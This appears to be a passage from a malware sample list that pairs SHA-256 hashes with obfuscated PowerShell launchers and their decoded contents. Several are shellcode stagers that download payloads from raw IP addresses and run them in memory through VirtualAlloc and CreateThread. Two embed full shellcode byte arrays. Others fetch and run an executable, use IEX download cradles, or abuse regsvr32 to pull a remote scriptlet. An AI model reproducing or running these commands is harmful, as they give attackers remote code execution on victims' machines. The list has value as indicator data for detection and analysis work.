KVhyOUzgYh1UtTLxSunROXGlbnAqz4+Be5EcJ7isPBAoRZvb9qed8DHK4j2h38B \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= 
$d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")$n = g; [Byte[]] $p = $m.DownloadData("http://139.59.148.180:443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  514. 31c14f8ce7b2f0e340f0ed4feb4de893770c67829e6aa7ce60e3391176a281f8
  515. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 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 \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://40.80.150.92:443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  516. 30c153318f15c1c35b668aae070f3c289466a1834488a525873308dfbacdf592
  517. abfcfacc1627c23fd08e0520f825b7342ba8f4dbe1aea9c02b771577ffa01e21
  518. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nZZbayNHEIXf/SsaMQ8SlszcL2sMu8kSWAghYJM8GD/09LRikbEkpNFG3iT/PVPfqNrZ5CXkpaev1VXnnKqeyJk783529fix7z+97HeHYT771R+2vs/Sm67vZ4snsz+1/caZ42CH8ePPw7huPm2HH4eD+WlzGE62/9D3Oze/zP22NKfNdjDny/f18v2yuP3f93x78HbwD8/jp9N7The7n5fm7eZL7293X2b+efvL8bM7DP/l7hf/cvTD/N+WQ1Sz91fRbgTyQ9etHl733qzGM60/fPTrzXYzbHZbEzmz+sG+eDP7ebPN0plZbcfRcW+dN8x8d9o62Xk0q709Hofnw+kqOt9Fu3fvvgI5XsbnJI7lk02fPF7cmsdvXgf/+PQUHYXR+NzZcaXzY9NKz9Vj0xTSyFyyltVmbKp8bFJp1tIUnQxbOSGrbSJb5GwmvUIMJNXY1NnYeNm8dmMTy7CRYV3KCZnzcq+XY7k0cSpnMSCWGxmWHFurFZtpsxYPKtyVYSJNjc+ykIhDHUO50knPyoLt1HEPTGI0kYXU6T6czGQ1lrkcNKTJW/W0jRWhWiBpcgWikHvXjQLhM8UFT12rnmYMpdeJqUaOxcxJU8hc1an3XsxXiW7GciuXF8xlgcFWw596oFYGJGPlrXZKqJW5UuyVMCNWaunlECD7OjnrZKEUDCqQlHvTVDfDWyvNWhY8sKOIKvArQ2sVdifHykbtVaXKopQmy5Vuh39vsYGk9BrZl8tqlyu1cJTghkBSYtmqlUZ6mRxLpbGVCikV1+pGRROzJVOEcnEjazX8NFHX6PlAfFkrWyDZIflAPNSWCBh+MwUW7YIzwozFq6zWe5vAvkenEgJiLZziQh5Z3CiUc2BCdcTbZoruJP6QLqkEnXoVDWoCDeaSkGAFeq6UKF8rxBQPL/ta2ZKLG0kZ7IGBbCGZ4AMaiQif16HcEEwhkGR4JfsoGUQE02sE5zVUNJlXIZhcPcUA/HrZbHGy0dsKOdY61YblhCzkpbqbypXoFEKtxOsSlQUFKsarRFWHp2DAEITeLm8alQXYV6FEOiSfhABlc11o+Osu3IFESV1KAT4H+UwQU24qpZH0azu9gxqB/ihp2LOpmichylDCMToFjf4EpobSJ3dY0gqYYIESiWJJsEztUVqoPj5VXFoakknmbKm6ot5TNwCRIsjbQ9AQCm+kaYzaM91H0S+C9CrqC3SjU4loeooqdQOIu0qPUQ7JGdAFIW4DUwoUErUho6jABE0ZdhJMDPuhaCGfKSVBiABLHUIPQVNAMyIv1V2kTB2CBbyiKFA3anGcBGuCEnkcWvblaoqyPlmWszykSawRQRSWCYbU4AQFBaFPyclcp3wQEcJkLu4UErRLaqRhDrp9oXopyHMKtwCGJinmPARFyHMeOagla2uYibXnQzKRppQMREORph5ghScBTU4/Ca1iOv21WEUDhya6O2UGiU76Q6cUVa8XUQqAHVP8H0wSDZJHYZP0EiUP4l2onXGtWKFJXtOprEsIZYiXZ4dkR2Y8WRTQzOmV5ELqbq/Wu4OZR5u7+DbamFXvx8HR3Xzvt78Mz6tkMc5eXy/M7/LDePljfZx+WZ/m0fnmYTcOsnS+uI42i6UZjz5Gm6elSRbmD7M7Davtqe9v/7yKvvDL+dX/9ujGMjov5SO/mveDPQyr+977vVnde7fbdkb+SOP4Lw== \" )))), [IO.Compression.CompressionMode]::Decompress)), 
[Text.Encoding]::ASCII)).ReadToEnd();" --> $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xda,0xde,0xba,0xc8,0x95,0x9e,0x1f,0xd9,0x74,0x24,0xf4,0x5d,0x2b,0xc9,0xb1,0x78,0x31,0x55,0x17,0x83,0xed,0xfc,0x03,0x9d,0x86,0x7c,0xea,0xe1,0x41,0x02,0x15,0x19,0x92,0x63,0x9f,0xfc,0xa3,0xa3,0xfb,0x75,0x93,0x13,0x8f,0xdb,0x18,0xdf,0xdd,0xcf,0xab,0xad,0xc9,0xe0,0x1c,0x1b,0x2c,0xcf,0x9d,0x30,0x0c,0x4e,0x1e,0x4b,0x41,0xb0,0x1f,0x84,0x94,0xb1,0x58,0xf9,0x55,0xe3,0x31,0x75,0xcb,0x13,0x35,0xc3,0xd0,0x98,0x05,0xc5,0x50,0x7d,0xdd,0xe4,0x71,0xd0,0x55,0xbf,0x51,0xd3,0xba,0xcb,0xdb,0xcb,0xdf,0xf6,0x92,0x60,0x2b,0x8c,0x24,0xa0,0x65,0x6d,0x8a,0x8d,0x49,0x9c,0xd2,0xca,0x6e,0x7f,0xa1,0x22,0x8d,0x02,0xb2,0xf1,0xef,0xd8,0x37,0xe1,0x48,0xaa,0xe0,0xcd,0x69,0x7f,0x76,0x86,0x66,0x34,0xfc,0xc0,0x6a,0xcb,0xd1,0x7b,0x96,0x40,0xd4,0xab,0x1e,0x12,0xf3,0x6f,0x7a,0xc0,0x9a,0x36,0x26,0xa7,0xa3,0x28,0x89,0x18,0x06,0x23,0x24,0x4c,0x3b,0x6e,0x21,0xfc,0x21,0xe4,0xb1,0x68,0xdd,0x6d,0xdc,0x01,0x75,0x05,0x6c,0xa5,0x53,0xd2,0x93,0x9c,0xad,0x07,0x38,0x4c,0x9d,0xe4,0xec,0x1a,0x1b,0x5c,0x6a,0x7c,0xa4,0xb5,0xdf,0xd1,0x31,0x36,0xb3,0x86,0xad,0xc3,0x13,0x29,0x2e,0xdb,0x51,0x28,0x2e,0x1b,0x75,0x59,0x57,0x76,0xe8,0xf3,0xde,0xeb,0xb9,0x44,0x16,0xdb,0x5c,0x0e,0x30,0x6f,0xcb,0xe4,0xa4,0xf5,0x9e,0x6a,0x52,0x39,0x2b,0x03,0xdf,0x40,0xf2,0x8e,0xb5,0xca,0x47,0x13,0x24,0x59,0x39,0xa7,0xee,0xae,0xe9,0xf5,0x5a,0xbc,0x7a,0xa9,0x35,0x46,0x0e,0x2f,0xe0,0xdd,0xa8,0xc1,0x23,0x15,0x0f,0x41,0x1e,0x03,0xb9,0x1e,0xe8,0xee,0xae,0x99,0x6d,0xc3,0x75,0x17,0xc6,0x61,0x40,0xfe,0x85,0x2b,0xfd,0x41,0x18,0x8b,0x84,0x79,0x32,0x93,0x0e,0x35,0x
e7,0x51,0xd8,0xbd,0xc6,0xd3,0x6c,0x0c,0x18,0xa2,0x41,0x26,0x68,0x31,0x93,0xa8,0xcd,0xea,0x9b,0x45,0xaf,0x7e,0x25,0xcc,0x48,0x4a,0x33,0x26,0xa0,0xf6,0xe2,0x1e,0xbe,0xbb,0x62,0xa6,0x57,0x19,0xef,0xb9,0xc5,0xd9,0x8b,0x39,0x5a,0x89,0x04,0xb3,0xc5,0x8f,0x54,0x16,0x70,0xc9,0xf8,0xf1,0x83,0xe7,0x1e,0x85,0xd7,0x54,0x8c,0xd1,0x84,0x0c,0x5a,0x35,0x7f,0x9e,0xa1,0x36,0x55,0x48,0xbf,0xc2,0x09,0x1c,0xc0,0xe0,0xb5,0xdc,0x49,0xe6,0xdc,0xd8,0x19,0x8d,0x3f,0xb6,0xf1,0x24,0x06,0xa8,0x84,0x38,0x53,0x87,0xdb,0x95,0x0f,0x71,0xb4,0x34,0xb6,0x65,0x3f,0xb8,0x63,0x10,0x7f,0x33,0x84,0x55,0xf5,0x65,0x7c,0x23,0xf5,0x95,0x7d,0xd9,0xb5,0xfd,0x7d,0x0d,0x36,0xfe,0x15,0x2d,0x36,0xbe,0xe5,0x7e,0x5e,0x66,0x42,0xd3,0x7b,0x69,0x5f,0x40,0xd0,0xc5,0xe9,0x81,0x80,0x81,0xe9,0x6d,0x2f,0x52,0xb9,0x3b,0x47,0x40,0xab,0x4a,0x75,0x9b,0x06,0xc9,0xba,0x10,0x66,0x5a,0x3d,0xd8,0xbb,0xd9,0x82,0xaf,0xde,0xb9,0xc1,0x0f,0xc9,0x4e,0x39,0x50,0xf6,0x85,0xf1,0x81,0x38,0xdc,0xc8,0xf3,0x08,0x2d,0x1e,0x22,0x5c,0x67,0x60,0x81,0x6e,0x32,0xc2,0xa3,0xe4,0x3c,0x50,0xb3,0x2c;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  519. ec9dd273f915db86de32394827f3f74a3cc6709cee006887ed2fb3ecf9edf753
  520. f1ff32316ecce6a59d391a10b391a06befd8b4eace52567a7770f2c41b939b73
  521. POWERSHELL.EXE powershell -window hidden -enc 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 --> PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://94.102.52.13/~yahoo/stchost.exe', $env:APPDATA\stchost.exe );Start-Process ( $env:APPDATA\stchost.exe )
  522. ffed4c39ee055d8a1e7e7f71c7161952809667eeea9ddb42eb32aad6c2e49a09
  523. powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://71.162.136.172:25/passwordpolicy'))"
  524. 77cdfb7a86ddcb20168828f30d6d35c8c24c01bc7aac1b2a1e726a574dba7cde
  525. powershell.exe -window hidden -enc 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 --> $lCyX = '$8D6W = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $8D6W -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xb8,0x16,0x87,0x78,0x01,0xd9,0xec,0xd9,0x74,0x24,0xf4,0x5e,0x29,0xc9,0xb1,0x47,0x83,0xee,0xfc,0x31,0x46,0x0f,0x03,0x46,0x19,0x65,0x8d,0xfd,0xcd,0xeb,0x6e,0xfe,0x0d,0x8c,0xe7,0x1b,0x3c,0x8c,0x9c,0x68,0x6e,0x3c,0xd6,0x3d,0x82,0xb7,0xba,0xd5,0x11,0xb5,0x12,0xd9,0x92,0x70,0x45,0xd4,0x23,0x28,0xb5,0x77,0xa7,0x33,0xea,0x57,0x96,0xfb,0xff,0x96,0xdf,0xe6,0xf2,0xcb,0x88,0x6d,0xa0,0xfb,0xbd,0x38,0x79,0x77,0x8d,0xad,0xf9,0x64,0x45,0xcf,0x28,0x3b,0xde,0x96,0xea,0xbd,0x33,0xa3,0xa2,0xa5,0x50,0x8e,0x7d,0x5d,0xa2,0x64,0x7c,0xb7,0xfb,0x85,0xd3,0xf6,0x34,0x74,0x2d,0x3e,0xf2,0x67,0x58,0x36,0x01,0x15,0x5b,0x8d,0x78,0xc1,0xee,0x16,0xda,0x82,0x49,0xf3,0xdb,0x47,0x0f,0x70,0xd7,0x2c,0x5b,0xde,0xfb,0xb3,0x88,0x54,0x07,0x3f,0x2f,0xbb,0x8e,0x7b,0x14,0x1f,0xcb,0xd8,0x35,0x06,0xb1,0x8f,0x4a,0x58,0x1a,0x6f,0xef,0x12,0xb6,0x64,0x82,0x78,0xde,0x49,0xaf,0x82,0x1e,0xc6,0xb8,0xf1,0x2c,0x49,0x13,0x9e,0x1c,0x02,0xbd,0x59,0x63,0x39,0x79,0xf5,0x9a,0xc2,0x7a,0xdf,0x58,0x96,0x2a,0x77,0x49,0x97,0xa0,0x87,0x76,0x42,0x5c,0x8d,0xe0,0xad,0x09,0x8c,0xde,0x45,0x48,0x8f,0x0f,0xca,0xc5,0x69,0x7f,0xa2,0x85,0x25,0x3f,0x12,0x66,0x96,0xd7,0x78,0x69,0xc9,0xc7,0x82,0xa3,0x62,0x6d,0x6d,0x1a,0xda,0x19,0x14,0x07,0x90,0xb8,0xd9,0x9d,0xdc,0xfa,0x52,0x12,0x20,0xb4,0x92,0x5f,0x32,0x20,0x53,0x2a,0x68,0xe6,0x6c,0x80,0x07,0x06,0xf9,0x2f,0x8e,0x51,0x95,0x2d,0xf7,0x95,0x3a,0xcd,0xd
2,0xae,0xf3,0x5b,0x9d,0xd8,0xfb,0x8b,0x1d,0x18,0xaa,0xc1,0x1d,0x70,0x0a,0xb2,0x4d,0x65,0x55,0x6f,0xe2,0x36,0xc0,0x90,0x53,0xeb,0x43,0xf9,0x59,0xd2,0xa4,0xa6,0xa2,0x31,0x35,0x9a,0x74,0x7f,0x43,0xf2,0x44;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$WVf=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($WVf.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$WVf,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($lCyX));$GNx = "-enc ";if([IntPtr]::Size -eq 8){$PxX = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $PxX $GNx $e"}else{;iex "& powershell $GNx $e";}
  526. ed06790b36e5a3581022a5d19e2f198011bb3c3a57e5ea4ae149906414fd2b6d
  527. powerShell.exe -WindowStyle hiddeN -ExeCuTionPolicy BypasS -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADcAOQAuADQAMwAuADEAMwAzAC4ANAA3AC8AdQBwAGQAYQB0AHAAbwAuAGoAcABnACAAcwBjAHIAbwBiAGoALgBkAGwAbAAKAA== --> regsvr32 /u /s /i:http://179.43.133.47/updatpo.jpg scrobj.dll
  528. 7950e0bc6059abe8d7428775568a31bf16648ce465f0944340c647728caa3eb4
  529. powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://173.203.86.247:8089/a'));
  530. 81a04ad251e55242a16e13d5b58f40431ec5ece6d0fc258c38d75b6c4b8cef3a